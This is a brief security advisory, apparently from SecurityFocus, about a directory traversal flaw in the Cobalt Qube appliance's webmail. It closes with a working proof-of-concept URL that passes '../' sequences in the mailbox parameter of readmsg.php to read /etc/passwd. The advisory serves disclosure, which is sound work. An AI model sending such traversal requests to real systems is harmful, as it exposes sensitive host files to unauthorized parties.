source: https://www.securityfocus.com/bid/2987/info
Cobalt Qube is an fully-featured network "server appliance".
It includes pre-installed tools and applications and can be put online with very little configuration.
A vulnerability in Cobalt Qube's webmail implementation allows remote attackers to traverse directories. Malformed HTTP requests can be crafted to display sensitive information about the host.
http://YOURCOBALTBOX:444/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1
